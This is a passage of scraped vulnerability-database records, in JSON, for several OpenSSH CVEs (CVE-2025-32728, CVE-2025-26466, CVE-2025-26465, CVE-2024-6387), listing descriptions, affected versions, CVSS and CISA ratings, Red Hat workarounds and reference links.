"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-32728",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-10T18:35:34.531350Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-10T18:35:46.150Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-08T13:11:19.684Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://security.netapp.com/advisory/ntap-20250425-0002/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00008.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.0",
"status": "affected",
"version": "7.4",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.0",
"versionStartIncluding": "7.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In sshd in OpenSSH before 10.0, the DisableForwarding directive does not adhere to the documentation stating that it disables X11 and agent forwarding."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-440",
"description": "CWE-440 Expected Behavior Violation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-10T01:40:34.658Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2025-April/041879.html"
},
{
"url": "https://www.openssh.com/txt/release-10.0"
},
{
"url": "https://github.com/openssh/openssh-portable/commit/fc86875e6acb36401dfc1dfb6b628a9d1460f367"
},
{
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/013_ssh.patch.sig"
},
{
"url": "https://www.openssh.com/txt/release-7.4"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-32728",
"datePublished": "2025-04-10T00:00:00.000Z",
"dateReserved": "2025-04-10T00:00:00.000Z",
"dateUpdated": "2025-05-08T13:11:19.684Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-26466 (GCVE-0-2025-26466)
Vulnerability from nvd – Published: 2025-02-28 21:25 – Updated: 2025-11-06 23:33- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
9.5p1 , ≤ 9.9p1
(custom)
|
||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T21:12:57.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://security.netapp.com/advisory/ntap-20250228-0002/"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237041"
},
{
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26466"
},
{
"url": "https://ubuntu.com/security/CVE-2025-26466"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26466",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-04T19:51:35.555196Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-04T19:51:39.308Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.9p1",
"status": "affected",
"version": "9.5p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "unaffected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2025-02-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packages. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packages, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T23:33:10.047Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26466"
},
{
"name": "RHBZ#2345043",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345043"
},
{
"url": "https://seclists.org/oss-sec/2025/q1/144"
},
{
"url": "https://www.qualys.com/2025/02/18/openssh-mitm-dos.txt"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-02-11T19:51:30.375000+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-02-18T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: denial-of-service in openssh",
"workarounds": [
{
"lang": "en",
"value": "This issue can be mitigated by setting the following three different options in the sshd configuration file located at: /etc/ssh/sshd_config\n\nMaxStartups: Set to a reasonable value, this option controls the maximum number of concurrent unauthenticated connections the SSH server accepts;\n\nPerSourcePenalties: Set its suboptions to a reasonable value, this option is used to help sshd to detect and drop connections that are potentially malicious for the SSH server;\n\nLoginGraceTime: Set to a resonable value, this option controls how much time the SSH server will wait the client to authenticate before dropping its connection;\n\nAll the three option above needs to be set to implement a full mitigation for this vulnerability."
}
],
"x_redhatCweChain": "CWE-770: Allocation of Resources Without Limits or Throttling"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-26466",
"datePublished": "2025-02-28T21:25:28.861Z",
"dateReserved": "2025-02-10T18:31:47.979Z",
"dateUpdated": "2025-11-06T23:33:10.047Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-26465 (GCVE-0-2025-26465)
Vulnerability from nvd – Published: 2025-02-18 18:27 – Updated: 2025-11-06 23:33- CWE-390 - Detection of Error Condition Without Action
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
6.8p1 , ≤ 9.9p1
(custom)
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T21:12:55.938Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00020.html"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/1"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/02/18/4"
},
{
"url": "https://www.theregister.com/2025/02/18/openssh_vulnerabilities_mitm_dos/"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1237040"
},
{
"url": "https://security-tracker.debian.org/tracker/CVE-2025-26465"
},
{
"url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.6/common/008_ssh.patch.sig"
},
{
"url": "https://ubuntu.com/security/CVE-2025-26465"
},
{
"url": "https://www.openssh.com/releasenotes.html#9.9p2"
},
{
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2025/02/18/qualys-tru-discovers-two-vulnerabilities-in-openssh-cve-2025-26465-cve-2025-26466"
},
{
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2025-February/000161.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250228-0003/"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-detect-vulnerable-openssh"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-26465-mitigate-vulnerable-openssh"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/8"
},
{
"url": "http://seclists.org/fulldisclosure/2025/May/7"
},
{
"url": "http://seclists.org/fulldisclosure/2025/Feb/18"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-26465",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-19T15:02:09.369445Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-19T15:02:45.555Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://seclists.org/oss-sec/2025/q1/144"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.9p1",
"status": "affected",
"version": "6.8p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.0p1-26.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.0p1-26.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-45.el9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-45.el9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.4::baseos",
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.4 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:discovery:1.14::el9"
],
"defaultStatus": "affected",
"packageName": "discovery/discovery-server-rhel9",
"product": "Red Hat Discovery 1.14",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "sha256:ad1045aa0de937c3a6969ec377f7bfeda9a44ee434a954e8245e9840316ffc1c",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2025-02-17T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in OpenSSH when the VerifyHostKeyDNS option is enabled. A machine-in-the-middle attack can be performed by a malicious machine impersonating a legit server. This issue occurs due to how OpenSSH mishandles error codes in specific conditions when verifying the host key. For an attack to be considered successful, the attacker needs to manage to exhaust the client\u0027s memory resource first, turning the attack complexity high."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-390",
"description": "Detection of Error Condition Without Action",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T23:33:09.945Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2025:16823",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:16823"
},
{
"name": "RHSA-2025:3837",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:3837"
},
{
"name": "RHSA-2025:6993",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:6993"
},
{
"name": "RHSA-2025:8385",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:8385"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-26465"
},
{
"url": "https://access.redhat.com/solutions/7109879"
},
{
"name": "RHBZ#2344780",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2344780"
},
{
"url": "https://seclists.org/oss-sec/2025/q1/144"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-02-10T21:56:03.853000+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-02-17T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: machine-in-the-middle attack if verifyhostkeydns is enabled",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-390: Detection of Error Condition Without Action"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-26465",
"datePublished": "2025-02-18T18:27:16.843Z",
"dateReserved": "2025-02-10T18:31:47.978Z",
"dateUpdated": "2025-11-06T23:33:09.945Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-6387 (GCVE-0-2024-6387)
Vulnerability from nvd – Published: 2024-07-01 12:37 – Updated: 2025-11-11 16:12- CWE-364 - Signal Handler Race Condition
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
Affected:
8.5p1 , ≤ 9.7p1
(custom)
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-6387",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-02T13:18:34.695298Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-02T13:18:46.662Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-04-24T18:35:27.934Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://www.vicarius.io/vsociety/posts/regresshion-an-openssh-regression-error-cve-2024-6387"
},
{
"url": "https://www.exploit-db.com/exploits/52269"
},
{
"url": "https://packetstorm.news/files/id/190587/"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/12"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/13"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/02/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/11"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/3"
},
{
"name": "RHSA-2024:4312",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"name": "RHSA-2024:4340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"name": "RHSA-2024:4389",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"name": "RHSA-2024:4469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"name": "RHSA-2024:4474",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"name": "RHSA-2024:4479",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"name": "RHSA-2024:4484",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"tags": [
"x_transferred"
],
"url": "https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/"
},
{
"tags": [
"x_transferred"
],
"url": "https://arstechnica.com/security/2024/07/regresshion-vulnerability-in-openssh-gives-attackers-root-on-linux/"
},
{
"tags": [
"x_transferred"
],
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server"
},
{
"name": "RHBZ#2294604",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"tags": [
"x_transferred"
],
"url": "https://explore.alas.aws.amazon.com/CVE-2024-6387.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=9132"
},
{
"tags": [
"x_transferred"
],
"url": "https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2024-002.txt.asc"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/AlmaLinux/updates/issues/629"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Azure/AKS/issues/4379"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/discussions/2248"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/issues/2249"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/microsoft/azurelinux/issues/9555"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openela-main/openssh/commit/e1f438970e5a337a17070a637c1b9e19697cad09"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/oracle/oracle-linux/issues/149"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/rapier1/hpn-ssh/issues/87"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/zgzhang/cve-2024-6387-poc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.almalinux.org/archives/list/announce@lists.almalinux.org/thread/23BF5BMGFVEVUI2WNVAGMLKT557EU7VY/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://news.ycombinator.com/item?id=40843778"
},
{
"tags": [
"x_transferred"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010"
},
{
"tags": [
"x_transferred"
],
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2024-6387"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240701-0001/"
},
{
"tags": [
"x_transferred"
],
"url": "https://sig-security.rocky.page/issues/CVE-2024-6387/"
},
{
"tags": [
"x_transferred"
],
"url": "https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/"
},
{
"tags": [
"x_transferred"
],
"url": "https://ubuntu.com/security/CVE-2024-6387"
},
{
"tags": [
